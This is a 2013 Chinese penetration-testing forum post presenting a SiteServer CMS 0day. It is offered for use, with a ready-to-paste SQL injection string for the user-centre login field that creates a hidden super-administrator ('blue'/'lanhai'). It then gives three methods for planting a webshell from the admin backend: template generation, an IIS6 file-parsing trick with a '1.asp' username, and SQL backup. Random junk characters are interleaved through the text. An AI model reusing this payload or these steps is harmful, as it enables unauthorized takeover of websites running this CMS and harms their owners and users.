中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
+ _3 Q. q' s, o1 A8 H2 N6 H
' ?: L6 A. D' \/ C$ |

" P3 k, L' Y. d$ e1 AEXP:

直接访问UserCenter/login.aspx
) z% V( s( z' S8 r4 }* }; `2 `
5 X( {' c, {" R' \% b; N

用户名处输入：
, j% h- f5 l1 d+ @! A# f
& Z" z& W$ f) U# h- S123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


$ O, |2 W8 W) F: n
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


+ h! d$ J* b# U& t; _
之后再访问后台SiteServer/login.aspx用插入的用户登陆
9 u% P5 \% J( I7 v6 v1 F' O
7 F" b) k$ C; b9 M

后台拿webshell的三种方法：
( X4 H2 A- i2 f7 L- J
. e0 h* b. [7 ~, d: \1 t) Y一、
+ f3 O9 Q+ j( y# N5 y
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
* y" h4 n/ Q2 r! M+ Y' I
, a; S0 j' U; {( b0 p$ @二、

成员权限-》添加用户-》用户名为：1.asp
2 {; Q- D, \. F2 u. p& t! G
http://127.0.0.1/usercenter/

" G; v! h2 C  P- A0 Z) \5 [4 o用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
4 D+ f7 t% h3 F$ F) q! W; o
（ps：后台添加用户时不会验证是否含有非法字符）
. [  `2 Y! O3 a1 f
1 G: {4 |" c4 H, \# a* ]三、
4 ]5 d# L2 l% ^/ R2 j4 [
系统工具-》实用工具-》机器参数查看
$ e6 ?1 u, ], Y7 c- O可以看到数据库类型、名称，WEB路径
& l! g3 b" S6 ], L0 o% b
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2